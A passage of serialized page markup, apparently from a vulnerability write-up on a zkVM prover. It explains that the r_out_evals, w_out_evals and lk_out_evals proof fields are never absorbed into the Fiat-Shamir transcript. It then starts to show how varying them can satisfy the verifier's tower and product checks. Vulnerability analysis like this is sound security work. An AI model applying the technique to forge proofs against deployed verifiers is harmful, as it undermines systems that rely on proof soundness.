:116,"props":118297,"children":118299},{"className":118298},[3705],[118300],{"type":28,"tag":116,"props":118301,"children":118303},{"className":118302,"style":114147},[3710],[118304],{"type":28,"tag":116,"props":118305,"children":118306},{},[],{"type":28,"tag":116,"props":118308,"children":118310},{"className":118309,"style":3798},[3759],[],{"type":28,"tag":116,"props":118312,"children":118314},{"className":118313},[3680,33],[118315],{"type":28,"tag":116,"props":118316,"children":118318},{"className":118317},[3680],[118319],{"type":33,"value":93482},{"type":28,"tag":116,"props":118321,"children":118323},{"className":118322,"style":92663},[3680],[118324],{"type":33,"value":2754},{"type":28,"tag":116,"props":118326,"children":118328},{"className":118327},[3680,33],[118329],{"type":28,"tag":116,"props":118330,"children":118332},{"className":118331},[3680],[118333],{"type":33,"value":118334},"out",{"type":28,"tag":116,"props":118336,"children":118338},{"className":118337,"style":92663},[3680],[118339],{"type":33,"value":2754},{"type":28,"tag":116,"props":118341,"children":118343},{"className":118342},[3680],[118344,118354],{"type":28,"tag":116,"props":118345,"children":118347},{"className":118346},[3680,33],[118348],{"type":28,"tag":116,"props":118349,"children":118351},{"className":118350},[3680],[118352],{"type":33,"value":118353},"evals",{"type":28,"tag":116,"props":118355,"children":118357},{"className":118356},[3695],[118358],{"type":28,"tag":116,"props":118359,"children":118361},{"className":118360},[3700,21305],[118362,118391],{"type":28,"tag":116,"props":118363,"children":118365},{"className":118364},[3705],[118366,118386],{"type":28,"tag":116,"props":118367,"children":118369},{"className":118368,"style":93192},[3710],[118370],{"type":28,"tag":116,"props":118371,"children":118372},{"style":113790},[118373,118377],{"type":28,"tag":116,"props":118374,"children":118376},{"className":118375,"style":3720},[3719],[],{"type":28,"tag":116,"props":118378,"children":118380},{"className":118379},[3725,3726,3727,3728],[118381],{"type":28,"tag":116,"props":118382,"children":118384},{"className":118383},[3680,21251,3728],[118385],{"type":33,"value":3408},{"type":28,"tag":116,"props":118387,"children":118389},{"className":118388},[21407],[118390],{"type":33,"value":21410},{"type":28,"tag":116,"props":118392,"children":118394},{"className":118393},[3705],[118395],{"type":28,"tag":116,"props":118396,"children":118398},{"className":118397,"style":92746},[3710],[118399],{"type":28,"tag":116,"props":118400,"children":118401},{},[],{"type":28,"tag":116,"props":118403,"children":118405},{"className":118404,"style":3857},[3759],[],{"type":28,"tag":116,"props":118407,"children":118409},{"className":118408},[3862],[118410],{"type":33,"value":373},{"type":28,"tag":116,"props":118412,"children":118414},{"className":118413,"style":3857},[3759],[],{"type":28,"tag":116,"props":118416,"children":118418},{"className":118417},[3669],[118419,118424,118481,118485,118494,118499,118508,118513,118575,118579,118584],{"type":28,"tag":116,"props":118420,"children":118423},{"className":118421,"style":118422},[3674],"height:1.1858em;vertical-align:-0.4358em;",[],{"type":28,"tag":116,"props":118425,"children":118427},{"className":118426},[21287],[118428,118433],{"type":28,"tag":116,"props":118429,"children":118431},{"className":118430,"style":21294},[21287,21292,21293],[118432],{"type":33,"value":118258},{"type":28,"tag":116,"props":118434,"children":118436},{"className":118435},[3695],[118437],{"type":28,"tag":116,"props":118438,"children":118440},{"className":118439},[3700,21305],[118441,118470],{"type":28,"tag":116,"props":118442,"children":118444},{"className":118443},[3705],[118445,118465],{"type":28,"tag":116,"props":118446,"children":118448},{"className":118447,"style":113867},[3710],[118449],{"type":28,"tag":116,"props":118450,"children":118451},{"style":21318},[118452,118456],{"type":28,"tag":116,"props":118453,"children":118455},{"className":118454,"style":3720},[3719],[],{"type":28,"tag":116,"props":118457,"children":118459},{"className":118458},[3725,3726,3727,3728],[118460],{"type":28,"tag":116,"props":118461,"children":118463},{"className":118462,"style":113883},[3680,21251,3728],[118464],{"type":33,"value":8328},{"type":28,"tag":116,"props":118466,"children":118468},{"className":118467},[21407],[118469],{"type":33,"value":21410},{"type":28,"tag":116,"props":118471,"children":118473},{"className":118472},[3705],[118474],{"type":28,"tag":116,"props":118475,"children":118477},{"className":118476,"style":113898},[3710],[118478],{"type":28,"tag":116,"props":118479,"children":118480},{},[],{"type":28,"tag":116,"props":118482,"children":118484},{"className":118483,"style":3798},[3759],[],{"type":28,"tag":116,"props":118486,"children":118488},{"className":118487},[3680,33],[118489],{"type":28,"tag":116,"props":118490,"children":118492},{"className":118491},[3680],[118493],{"type":33,"value":49193},{"type":28,"tag":116,"props":118495,"children":118497},{"className":118496,"style":92663},[3680],[118498],{"type":33,"value":2754},{"type":28,"tag":116,"props":118500,"children":118502},{"className":118501},[3680,33],[118503],{"type":28,"tag":116,"props":118504,"children":118506},{"className":118505},[3680],[118507],{"type":33,"value":118334},{"type":28,"tag":116,"props":118509,"children":118511},{"className":118510,"style":92663},[3680],[118512],{"type":33,"value":2754},{"type":28,"tag":116,"props":118514,"children":118516},{"className":118515},[3680],[118517,118526],{"type":28,"tag":116,"props":118518,"children":118520},{"className":118519},[3680,33],[118521],{"type":28,"tag":116,"props":118522,"children":118524},{"className":118523},[3680],[118525],{"type":33,"value":118353},{"type":28,"tag":116,"props":118527,"children":118529},{"className":118528},[3695],[118530],{"type":28,"tag":116,"props":118531,"children":118533},{"className":118532},[3700,21305],[118534,118563],{"type":28,"tag":116,"props":118535,"children":118537},{"className":118536},[3705],[118538,118558],{"type":28,"tag":116,"props":118539,"children":118541},{"className":118540,"style":93192},[3710],[118542],{"type":28,"tag":116,"props":118543,"children":118544},{"style":113790},[118545,118549],{"type":28,"tag":116,"props":118546,"children":118548},{"className":118547,"style":3720},[3719],[],{"type":28,"tag":116,"props":118550,"children":118552},{"className":118551},[3725,3726,3727,3728],[118553],{"type":28,"tag":116,"props":118554,"children":118556},{"className":118555,"style":113883},[3680,21251,3728],[118557],{"type":33,"value":8328},{"type":28,"tag":116,"props":118559,"children":118561},{"className":118560},[21407],[118562],{"type":33,"value":21410},{"type":28,"tag":116,"props":118564,"children":118566},{"className":118565},[3705],[118567],{"type":28,"tag":116,"props":118568,"children":118571},{"className":118569,"style":118570},[3710],"height:0.2861em;",[118572],{"type":28,"tag":116,"props":118573,"children":118574},{},[],{"type":28,"tag":116,"props":118576,"children":118578},{"className":118577,"style":3760},[3759],[],{"type":28,"tag":116,"props":118580,"children":118582},{"className":118581},[3765],[118583],{"type":33,"value":110922},{"type":28,"tag":116,"props":118585,"children":118587},{"className":118586,"style":3760},[3759],[],{"type":28,"tag":116,"props":118589,"children":118591},{"className":118590},[3669],[118592,118596,118601,118611],{"type":28,"tag":116,"props":118593,"children":118595},{"className":118594,"style":3780},[3674],[],{"type":28,"tag":116,"props":118597,"children":118599},{"className":118598},[21380],[118600],{"type":33,"value":313},{"type":28,"tag":116,"props":118602,"children":118604},{"className":118603},[3680,33],[118605],{"type":28,"tag":116,"props":118606,"children":118608},{"className":118607},[3680],[118609],{"type":33,"value":118610},"state factors",{"type":28,"tag":116,"props":118612,"children":118614},{"className":118613},[21401],[118615],{"type":33,"value":1829},{"type":28,"tag":29,"props":118617,"children":118618},{},[118619],{"type":28,"tag":4995,"props":118620,"children":118621},{},[118622],{"type":33,"value":115076},{"type":28,"tag":234,"props":118624,"children":118626},{"code":118625},"ZKVMChipProof {\n    r_out_evals: [[FieldElement]],   // \u003C- VULNERABLE\n    w_out_evals: [[FieldElement]],   // \u003C- VULNERABLE\n    lk_out_evals: [[FieldElement]],  // \u003C- VULNERABLE\n    tower_proof: [...],\n    gkr_iop_proof: [...],\n}\n",[118627],{"type":28,"tag":98,"props":118628,"children":118629},{"__ignoreMap":7},[118630],{"type":33,"value":118625},{"type":28,"tag":29,"props":118632,"children":118633},{},[118634,118640,118641,118647,118648,118654],{"type":28,"tag":98,"props":118635,"children":118637},{"className":118636},[],[118638],{"type":33,"value":118639},"r_out_evals",{"type":33,"value":825},{"type":28,"tag":98,"props":118642,"children":118644},{"className":118643},[],[118645],{"type":33,"value":118646},"w_out_evals",{"type":33,"value":6159},{"type":28,"tag":98,"props":118649,"children":118651},{"className":118650},[],[118652],{"type":33,"value":118653},"lk_out_evals",{"type":33,"value":118655}," are used to initialize the tower sumcheck claim, but they're never absorbed into the transcript. This leaves us with two equations:",{"type":28,"tag":455,"props":118657,"children":118658},{},[118659],{"type":28,"tag":459,"props":118660,"children":118661},{},[118662,118667,118669,118675],{"type":28,"tag":4995,"props":118663,"children":118664},{},[118665],{"type":33,"value":118666},"GKR/Tower equation",{"type":33,"value":118668}," (linear in ",{"type":28,"tag":98,"props":118670,"children":118672},{"className":118671},[],[118673],{"type":33,"value":118674},"out_evals",{"type":33,"value":23600},{"type":28,"tag":29,"props":118677,"children":118678},{},[118679,118681],{"type":33,"value":118680},"The tower sumcheck claim is ",{"type":28,"tag":98,"props":118682,"children":118684},{"className":118683},[3652,3653],[118685],{"type":28,"tag":116,"props":118686,"children":118688},{"className":118687},[3658],[118689],{"type":28,"tag":116,"props":118690,"children":118692},{"className":118691,"ariaHidden":3664},[3663],[118693,118724,118849],{"type":28,"tag":116,"props":118694,"children":118696},{"className":118695},[3669],[118697,118701,118711,118715,118720],{"type":28,"tag":116,"props":118698,"children":118700},{"className":118699,"style":92578},[3674],[],{"type":28,"tag":116,"props":118702,"children":118704},{"className":118703},[3680,33],[118705],{"type":28,"tag":116,"props":118706,"children":118708},{"className":118707},[3680],[118709],{"type":33,"value":118710},"claim",{"type":28,"tag":116,"props":118712,"children":118714},{"className":118713,"style":3857},[3759],[],{"type":28,"tag":116,"props":118716,"children":118718},{"className":118717},[3862],[118719],{"type":33,"value":373},{"type":28,"tag":116,"props":118721,"children":118723},{"className":118722,"style":3857},[3759],[],{"type":28,"tag":116,"props":118725,"children":118727},{"className":118726},[3669],[118728,118733,118790,118794,118836,118840,118845],{"type":28,"tag":116,"props":118729,"children":118732},{"className":118730,"style":118731},[3674],"height:1.2605em;vertical-align:-0.4358em;",[],{"type":28,"tag":116,"props":118734,"children":118736},{"className":118735},[21287],[118737,118742],{"type":28,"tag":116,"props":118738,"children":118740},{"className":118739,"style":21294},[21287,21292,21293],[118741],{"type":33,"value":108455},{"type":28,"tag":116,"props":118743,"children":118745},{"className":118744},[3695],[118746],{"type":28,"tag":116,"props":118747,"children":118749},{"className":118748},[3700,21305],[118750,118779],{"type":28,"tag":116,"props":118751,"children":118753},{"className":118752},[3705],[118754,118774],{"type":28,"tag":116,"props":118755,"children":118757},{"className":118756,"style":113867},[3710],[118758],{"type":28,"tag":116,"props":118759,"children":118760},{"style":21318},[118761,118765],{"type":28,"tag":116,"props":118762,"children":118764},{"className":118763,"style":3720},[3719],[],{"type":28,"tag":116,"props":118766,"children":118768},{"className":118767},[3725,3726,3727,3728],[118769],{"type":28,"tag":116,"props":118770,"children":118772},{"className":118771,"style":113883},[3680,21251,3728],[118773],{"type":33,"value":8328},{"type":28,"tag":116,"props":118775,"children":118777},{"className":118776},[21407],[118778],{"type":33,"value":21410},{"type":28,"tag":116,"props":118780,"children":118782},{"className":118781},[3705],[118783],{"type":28,"tag":116,"props":118784,"children":118786},{"className":118785,"style":113898},[3710],[118787],{"type":28,"tag":116,"props":118788,"children":118789},{},[],{"type":28,"tag":116,"props":118791,"children":118793},{"className":118792,"style":3798},[3759],[],{"type":28,"tag":116,"props":118795,"children":118797},{"className":118796},[3680],[118798,118803],{"type":28,"tag":116,"props":118799,"children":118801},{"className":118800,"style":114748},[3680,21251],[118802],{"type":33,"value":114751},{"type":28,"tag":116,"props":118804,"children":118806},{"className":118805},[3695],[118807],{"type":28,"tag":116,"props":118808,"children":118810},{"className":118809},[3700],[118811],{"type":28,"tag":116,"props":118812,"children":118814},{"className":118813},[3705],[118815],{"type":28,"tag":116,"props":118816,"children":118819},{"className":118817,"style":118818},[3710],"height:0.8247em;",[118820],{"type":28,"tag":116,"props":118821,"children":118822},{"style":3714},[118823,118827],{"type":28,"tag":116,"props":118824,"children":118826},{"className":118825,"style":3720},[3719],[],{"type":28,"tag":116,"props":118828,"children":118830},{"className":118829},[3725,3726,3727,3728],[118831],{"type":28,"tag":116,"props":118832,"children":118834},{"className":118833,"style":113883},[3680,21251,3728],[118835],{"type":33,"value":8328},{"type":28,"tag":116,"props":118837,"children":118839},{"className":118838,"style":3760},[3759],[],{"type":28,"tag":116,"props":118841,"children":118843},{"className":118842},[3765],[118844],{"type":33,"value":110922},{"type":28,"tag":116,"props":118846,"children":118848},{"className":118847,"style":3760},[3759],[],{"type":28,"tag":116,"props":118850,"children":118852},{"className":118851},[3669],[118853,118857,118866,118871],{"type":28,"tag":116,"props":118854,"children":118856},{"className":118855,"style":94076},[3674],[],{"type":28,"tag":116,"props":118858,"children":118860},{"className":118859},[3680,33],[118861],{"type":28,"tag":116,"props":118862,"children":118864},{"className":118863},[3680],[118865],{"type":33,"value":118334},{"type":28,"tag":116,"props":118867,"children":118869},{"className":118868,"style":92663},[3680],[118870],{"type":33,"value":2754},{"type":28,"tag":116,"props":118872,"children":118874},{"className":118873},[3680],[118875,118884],{"type":28,"tag":116,"props":118876,"children":118878},{"className":118877},[3680,33],[118879],{"type":28,"tag":116,"props":118880,"children":118882},{"className":118881},[3680],[118883],{"type":33,"value":118353},{"type":28,"tag":116,"props":118885,"children":118887},{"className":118886},[3695],[118888],{"type":28,"tag":116,"props":118889,"children":118891},{"className":118890},[3700,21305],[118892,118921],{"type":28,"tag":116,"props":118893,"children":118895},{"className":118894},[3705],[118896,118916],{"type":28,"tag":116,"props":118897,"children":118899},{"className":118898,"style":93192},[3710],[118900],{"type":28,"tag":116,"props":118901,"children":118902},{"style":113790},[118903,118907],{"type":28,"tag":116,"props":118904,"children":118906},{"className":118905,"style":3720},[3719],[],{"type":28,"tag":116,"props":118908,"children":118910},{"className":118909},[3725,3726,3727,3728],[118911],{"type":28,"tag":116,"props":118912,"children":118914},{"className":118913,"style":113883},[3680,21251,3728],[118915],{"type":33,"value":8328},{"type":28,"tag":116,"props":118917,"children":118919},{"className":118918},[21407],[118920],{"type":33,"value":21410},{"type":28,"tag":116,"props":118922,"children":118924},{"className":118923},[3705],[118925],{"type":28,"tag":116,"props":118926,"children":118928},{"className":118927,"style":118570},[3710],[118929],{"type":28,"tag":116,"props":118930,"children":118931},{},[],{"type":28,"tag":29,"props":118933,"children":118934},{},[118935,118937,118942],{"type":33,"value":118936},"This check is linear in ",{"type":28,"tag":98,"props":118938,"children":118940},{"className":118939},[],[118941],{"type":33,"value":118674},{"type":33,"value":141},{"type":28,"tag":455,"props":118944,"children":118945},{"start":256},[118946],{"type":28,"tag":459,"props":118947,"children":118948},{},[118949,118954,118956,118961],{"type":28,"tag":4995,"props":118950,"children":118951},{},[118952],{"type":33,"value":118953},"rw-product consistency",{"type":33,"value":118955}," (bilinear in ",{"type":28,"tag":98,"props":118957,"children":118959},{"className":118958},[],[118960],{"type":33,"value":118674},{"type":33,"value":23600},{"type":28,"tag":29,"props":118963,"children":118964},{},[118965],{"type":28,"tag":98,"props":118966,"children":118968},{"className":118967},[3652,3653],[118969],{"type":28,"tag":116,"props":118970,"children":118972},{"className":118971},[3658],[118973],{"type":28,"tag":116,"props":118974,"children":118976},{"className":118975,"ariaHidden":3664},[3663],[118977,119148,119319],{"type":28,"tag":116,"props":118978,"children":118980},{"className":118979},[3669],[118981,118985,119042,119046,119055,119060,119069,119074,119135,119139,119144],{"type":28,"tag":116,"props":118982,"children":118984},{"className":118983,"style":92605},[3674],[],{"type":28,"tag":116,"props":118986,"children":118988},{"className":118987},[21287],[118989,118994],{"type":28,"tag":116,"props":118990,"children":118992},{"className":118991,"style":21294},[21287,21292,21293],[118993],{"type":33,"value":118258},{"type":28,"tag":116,"props":118995,"children":118997},{"className":118996},[3695],[118998],{"type":28,"tag":116,"props":118999,"children":119001},{"className":119000},[3700,21305],[119002,119031],{"type":28,"tag":116,"props":119003,"children":119005},{"className":119004},[3705],[119006,119026],{"type":28,"tag":116,"props":119007,"children":119009},{"className":119008,"style":113867},[3710],[119010],{"type":28,"tag":116,"props":119011,"children":119012},{"style":21318},[119013,119017],{"type":28,"tag":116,"props":119014,"children":119016},{"className":119015,"style":3720},[3719],[],{"type":28,"tag":116,"props":119018,"children":119020},{"className":119019},[3725,3726,3727,3728],[119021],{"type":28,"tag":116,"props":119022,"children":119024},{"className":119023},[3680,21251,3728],[119025],{"type":33,"value":3408},{"type":28,"tag":116,"props":119027,"children":119029},{"className":119028},[21407],[119030],{"type":33,"value":21410},{"type":28,"tag":116,"props":119032,"children":119034},{"className":119033},[3705],[119035],{"type":28,"tag":116,"props":119036,"children":119038},{"className":119037,"style":114147},[3710],[119039],{"type":28,"tag":116,"props":119040,"children":119041},{},[],{"type":28,"tag":116,"props":119043,"children":119045},{"className":119044,"style":3798},[3759],[],{"type":28,"tag":116,"props":119047,"children":119049},{"className":119048},[3680,33],[119050],{"type":28,"tag":116,"props":119051,"children":119053},{"className":119052},[3680],[119054],{"type":33,"value":93482},{"type":28,"tag":116,"props":119056,"children":119058},{"className":119057,"style":92663},[3680],[119059],{"type":33,"value":2754},{"type":28,"tag":116,"props":119061,"children":119063},{"className":119062},[3680,33],[119064],{"type":28,"tag":116,"props":119065,"children":119067},{"className":119066},[3680],[119068],{"type":33,"value":118334},{"type":28,"tag":116,"props":119070,"children":119072},{"className":119071,"style":92663},[3680],[119073],{"type":33,"value":2754},{"type":28,"tag":116,"props":119075,"children":119077},{"className":119076},[3680],[119078,119087],{"type":28,"tag":116,"props":119079,"children":119081},{"className":119080},[3680,33],[119082],{"type":28,"tag":116,"props":119083,"children":119085},{"className":119084},[3680],[119086],{"type":33,"value":118353},{"type":28,"tag":116,"props":119088,"children":119090},{"className":119089},[3695],[119091],{"type":28,"tag":116,"props":119092,"children":119094},{"className":119093},[3700,21305],[119095,119124],{"type":28,"tag":116,"props":119096,"children":119098},{"className":119097},[3705],[119099,119119],{"type":28,"tag":116,"props":119100,"children":119102},{"className":119101,"style":93192},[3710],[119103],{"type":28,"tag":116,"props":119104,"children":119105},{"style":113790},[119106,119110],{"type":28,"tag":116,"props":119107,"children":119109},{"className":119108,"style":3720},[3719],[],{"type":28,"tag":116,"props":119111,"children":119113},{"className":119112},[3725,3726,3727,3728],[119114],{"type":28,"tag":116,"props":119115,"children":119117},{"className":119116},[3680,21251,3728],[119118],{"type":33,"value":3408},{"type":28,"tag":116,"props":119120,"children":119122},{"className":119121},[21407],[119123],{"type":33,"value":21410},{"type":28,"tag":116,"props":119125,"children":119127},{"className":119126},[3705],[119128],{"type":28,"tag":116,"props":119129,"children":119131},{"className":119130,"style":92746},[3710],[119132],{"type":28,"tag":116,"props":119133,"children":119134},{},[],{"type":28,"tag":116,"props":119136,"children":119138},{"className":119137,"style":3857},[3759],[],{"type":28,"tag":116,"props":119140,"children":119142},{"className":119141},[3862],[119143],{"type":33,"value":373},{"type":28,"tag":116,"props":119145,"children":119147},{"className":119146,"style":3857},[3759],[],{"type":28,"tag":116,"props":119149,"children":119151},{"className":119150},[3669],[119152,119156,119213,119217,119226,119231,119240,119245,119306,119310,119315],{"type":28,"tag":116,"props":119153,"children":119155},{"className":119154,"style":118422},[3674],[],{"type":28,"tag":116,"props":119157,"children":119159},{"className":119158},[21287],[119160,119165],{"type":28,"tag":116,"props":119161,"children":119163},{"className":119162,"style":21294},[21287,21292,21293],[119164],{"type":33,"value":118258},{"type":28,"tag":116,"props":119166,"children":119168},{"className":119167},[3695],[119169],{"type":28,"tag":116,"props":119170,"children":119172},{"className":119171},[3700,21305],[119173,119202],{"type":28,"tag":116,"props":119174,"children":119176},{"className":119175},[3705],[119177,119197],{"type":28,"tag":116,"props":119178,"children":119180},{"className":119179,"style":113867},[3710],[119181],{"type":28,"tag":116,"props":119182,"children":119183},{"style":21318},[119184,119188],{"type":28,"tag":116,"props":119185,"children":119187},{"className":119186,"style":3720},[3719],[],{"type":28,"tag":116,"props":119189,"children":119191},{"className":119190},[3725,3726,3727,3728],[119192],{"type":28,"tag":116,"props":119193,"children":119195},{"className":119194,"style":113883},[3680,21251,3728],[119196],{"type":33,"value":8328},{"type":28,"tag":116,"props":119198,"children":119200},{"className":119199},[21407],[119201],{"type":33,"value":21410},{"type":28,"tag":116,"props":119203,"children":119205},{"className":119204},[3705],[119206],{"type":28,"tag":116,"props":119207,"children":119209},{"className":119208,"style":113898},[3710],[119210],{"type":28,"tag":116,"props":119211,"children":119212},{},[],{"type":28,"tag":116,"props":119214,"children":119216},{"className":119215,"style":3798},[3759],[],{"type":28,"tag":116,"props":119218,"children":119220},{"className":119219},[3680,33],[119221],{"type":28,"tag":116,"props":119222,"children":119224},{"className":119223},[3680],[119225],{"type":33,"value":49193},{"type":28,"tag":116,"props":119227,"children":119229},{"className":119228,"style":92663},[3680],[119230],{"type":33,"value":2754},{"type":28,"tag":116,"props":119232,"children":119234},{"className":119233},[3680,33],[119235],{"type":28,"tag":116,"props":119236,"children":119238},{"className":119237},[3680],[119239],{"type":33,"value":118334},{"type":28,"tag":116,"props":119241,"children":119243},{"className":119242,"style":92663},[3680],[119244],{"type":33,"value":2754},{"type":28,"tag":116,"props":119246,"children":119248},{"className":119247},[3680],[119249,119258],{"type":28,"tag":116,"props":119250,"children":119252},{"className":119251},[3680,33],[119253],{"type":28,"tag":116,"props":119254,"children":119256},{"className":119255},[3680],[119257],{"type":33,"value":118353},{"type":28,"tag":116,"props":119259,"children":119261},{"className":119260},[3695],[119262],{"type":28,"tag":116,"props":119263,"children":119265},{"className":119264},[3700,21305],[119266,119295],{"type":28,"tag":116,"props":119267,"children":119269},{"className":119268},[3705],[119270,119290],{"type":28,"tag":116,"props":119271,"children":119273},{"className":119272,"style":93192},[3710],[119274],{"type":28,"tag":116,"props":119275,"children":119276},{"style":113790},[119277,119281],{"type":28,"tag":116,"props":119278,"children":119280},{"className":119279,"style":3720},[3719],[],{"type":28,"tag":116,"props":119282,"children":119284},{"className":119283},[3725,3726,3727,3728],[119285],{"type":28,"tag":116,"props":119286,"children":119288},{"className":119287,"style":113883},[3680,21251,3728],[119289],{"type":33,"value":8328},{"type":28,"tag":116,"props":119291,"children":119293},{"className":119292},[21407],[119294],{"type":33,"value":21410},{"type":28,"tag":116,"props":119296,"children":119298},{"className":119297},[3705],[119299],{"type":28,"tag":116,"props":119300,"children":119302},{"className":119301,"style":118570},[3710],[119303],{"type":28,"tag":116,"props":119304,"children":119305},{},[],{"type":28,"tag":116,"props":119307,"children":119309},{"className":119308,"style":3760},[3759],[],{"type":28,"tag":116,"props":119311,"children":119313},{"className":119312},[3765],[119314],{"type":33,"value":110922},{"type":28,"tag":116,"props":119316,"children":119318},{"className":119317,"style":3760},[3759],[],{"type":28,"tag":116,"props":119320,"children":119322},{"className":119321},[3669],[119323,119327,119332,119341],{"type":28,"tag":116,"props":119324,"children":119326},{"className":119325,"style":3780},[3674],[],{"type":28,"tag":116,"props":119328,"children":119330},{"className":119329},[21380],[119331],{"type":33,"value":313},{"type":28,"tag":116,"props":119333,"children":119335},{"className":119334},[3680,33],[119336],{"type":28,"tag":116,"props":119337,"children":119339},{"className":119338},[3680],[119340],{"type":33,"value":118610},{"type":28,"tag":116,"props":119342,"children":119344},{"className":119343},[21401],[119345],{"type":33,"value":1829},{"type":28,"tag":29,"props":119347,"children":119348},{},[119349,119351,119520,119521,119690],{"type":33,"value":119350},"If we vary ",{"type":28,"tag":98,"props":119352,"children":119354},{"className":119353},[3652,3653],[119355],{"type":28,"tag":116,"props":119356,"children":119358},{"className":119357},[3658],[119359],{"type":28,"tag":116,"props":119360,"children":119362},{"className":119361,"ariaHidden":3664},[3663],[119363,119441],{"type":28,"tag":116,"props":119364,"children":119366},{"className":119365},[3669],[119367,119371,119428,119432,119437],{"type":28,"tag":116,"props":119368,"children":119370},{"className":119369,"style":109630},[3674],[],{"type":28,"tag":116,"props":119372,"children":119374},{"className":119373},[3680],[119375,119380],{"type":28,"tag":116,"props":119376,"children":119378},{"className":119377},[3680,21251],[119379],{"type":33,"value":18939},{"type":28,"tag":116,"props":119381,"children":119383},{"className":119382},[3695],[119384],{"type":28,"tag":116,"props":119385,"children":119387},{"className":119386},[3700,21305],[119388,119417],{"type":28,"tag":116,"props":119389,"children":119391},{"className":119390},[3705],[119392,119412],{"type":28,"tag":116,"props":119393,"children":119395},{"className":119394,"style":92715},[3710],[119396],{"type":28,"tag":116,"props":119397,"children":119398},{"style":92719},[119399,119403],{"type":28,"tag":116,"props":119400,"children":119402},{"className":119401,"style":3720},[3719],[],{"type":28,"tag":116,"props":119404,"children":119406},{"className":119405},[3725,3726,3727,3728],[119407],{"type":28,"tag":116,"props":119408,"children":119410},{"className":119409},[3680,3728],[119411],{"type":33,"value":353},{"type":28,"tag":116,"props":119413,"children":119415},{"className":119414},[21407],[119416],{"type":33,"value":21410},{"type":28,"tag":116,"props":119418,"children":119420},{"className":119419},[3705],[119421],{"type":28,"tag":116,"props":119422,"children":119424},{"className":119423,"style":92746},[3710],[119425],{"type":28,"tag":116,"props":119426,"children":119427},{},[],{"type":28,"tag":116,"props":119429,"children":119431},{"className":119430,"style":3857},[3759],[],{"type":28,"tag":116,"props":119433,"children":119435},{"className":119434},[3862],[119436],{"type":33,"value":373},{"type":28,"tag":116,"props":119438,"children":119440},{"className":119439,"style":3857},[3759],[],{"type":28,"tag":116,"props":119442,"children":119444},{"className":119443},[3669],[119445,119449,119490,119495,119500,119505,119510,119515],{"type":28,"tag":116,"props":119446,"children":119448},{"className":119447,"style":92605},[3674],[],{"type":28,"tag":116,"props":119450,"children":119452},{"className":119451},[3680],[119453,119462,119467,119476,119481],{"type":28,"tag":116,"props":119454,"children":119456},{"className":119455},[3680,33],[119457],{"type":28,"tag":116,"props":119458,"children":119460},{"className":119459},[3680],[119461],{"type":33,"value":93482},{"type":28,"tag":116,"props":119463,"children":119465},{"className":119464,"style":92663},[3680],[119466],{"type":33,"value":2754},{"type":28,"tag":116,"props":119468,"children":119470},{"className":119469},[3680,33],[119471],{"type":28,"tag":116,"props":119472,"children":119474},{"className":119473},[3680],[119475],{"type":33,"value":118334},{"type":28,"tag":116,"props":119477,"children":119479},{"className":119478,"style":92663},[3680],[119480],{"type":33,"value":2754},{"type":28,"tag":116,"props":119482,"children":119484},{"className":119483},[3680,33],[119485],{"type":28,"tag":116,"props":119486,"children":119488},{"className":119487},[3680],[119489],{"type":33,"value":118353},{"type":28,"tag":116,"props":119491,"children":119493},{"className":119492},[21380],[119494],{"type":33,"value":347},{"type":28,"tag":116,"props":119496,"children":119498},{"className":119497},[3680],[119499],{"type":33,"value":353},{"type":28,"tag":116,"props":119501,"children":119503},{"className":119502},[21401],[119504],{"type":33,"value":15074},{"type":28,"tag":116,"props":119506,"children":119508},{"className":119507},[21380],[119509],{"type":33,"value":347},{"type":28,"tag":116,"props":119511,"children":119513},{"className":119512},[3680],[119514],{"type":33,"value":353},{"type":28,"tag":116,"props":119516,"children":119518},{"className":119517},[21401],[119519],{"type":33,"value":15074},{"type":33,"value":10659},{"type":28,"tag":98,"props":119522,"children":119524},{"className":119523},[3652,3653],[119525],{"type":28,"tag":116,"props":119526,"children":119528},{"className":119527},[3658],[119529],{"type":28,"tag":116,"props":119530,"children":119532},{"className":119531,"ariaHidden":3664},[3663],[119533,119611],{"type":28,"tag":116,"props":119534,"children":119536},{"className":119535},[3669],[119537,119541,119598,119602,119607],{"type":28,"tag":116,"props":119538,"children":119540},{"className":119539,"style":109630},[3674],[],{"type":28,"tag":116,"props":119542,"children":119544},{"className":119543},[3680],[119545,119550],{"type":28,"tag":116,"props":119546,"children":119548},{"className":119547},[3680,21251],[119549],{"type":33,"value":18939},{"type":28,"tag":116,"props":119551,"children":119553},{"className":119552},[3695],[119554],{"type":28,"tag":116,"props":119555,"children":119557},{"className":119556},[3700,21305],[119558,119587],{"type":28,"tag":116,"props":119559,"children":119561},{"className":119560},[3705],[119562,119582],{"type":28,"tag":116,"props":119563,"children":119565},{"className":119564,"style":92715},[3710],[119566],{"type":28,"tag":116,"props":119567,"children":119568},{"style":92719},[119569,119573],{"type":28,"tag":116,"props":119570,"children":119572},{"className":119571,"style":3720},[3719],[],{"type":28,"tag":116,"props":119574,"children":119576},{"className":119575},[3725,3726,3727,3728],[119577],{"type":28,"tag":116,"props":119578,"children":119580},{"className":119579},[3680,3728],[119581],{"type":33,"value":1824},{"type":28,"tag":116,"props":119583,"children":119585},{"className":119584},[21407],[119586],{"type":33,"value":21410},{"type":28,"tag":116,"props":119588,"children":119590},{"className":119589},[3705],[119591],{"type":28,"tag":116,"props":119592,"children":119594},{"className":119593,"style":92746},[3710],[119595],{"type":28,"tag":116,"props":119596,"children":119597},{},[],{"type":28,"tag":116,"props":119599,"children":119601},{"className":119600,"style":3857},[3759],[],{"type":28,"tag":116,"props":119603,"children":119605},{"className":119604},[3862],[119606],{"type":33,"value":373},{"type":28,"tag":116,"props":119608,"children":119610},{"className":119609,"style":3857},[3759],[],{"type":28,"tag":116,"props":119612,"children":119614},{"className":119613},[3669],[119615,119619,119660,119665,119670,119675,119680,119685],{"type":28,"tag":116,"props":119616,"children":119618},{"className":119617,"style":92605},[3674],[],{"type":28,"tag":116,"props":119620,"children":119622},{"className":119621},[3680],[119623,119632,119637,119646,119651],{"type":28,"tag":116,"props":119624,"children":119626},{"className":119625},[3680,33],[119627],{"type":28,"tag":116,"props":119628,"children":119630},{"className":119629},[3680],[119631],{"type":33,"value":93482},{"type":28,"tag":116,"props":119633,"children":119635},{"className":119634,"style":92663},[3680],[119636],{"type":33,"value":2754},{"type":28,"tag":116,"props":119638,"children":119640},{"className":119639},[3680,33],[119641],{"type":28,"tag":116,"props":119642,"children":119644},{"className":119643},[3680],[119645],{"type":33,"value":118334},{"type":28,"tag":116,"props":119647,"children":119649},{"className":119648,"style":92663},[3680],[119650],{"type":33,"value":2754},{"type":28,"tag":116,"props":119652,"children":119654},{"className":119653},[3680,33],[119655],{"type":28,"tag":116,"props":119656,"children":119658},{"className":119657},[3680],[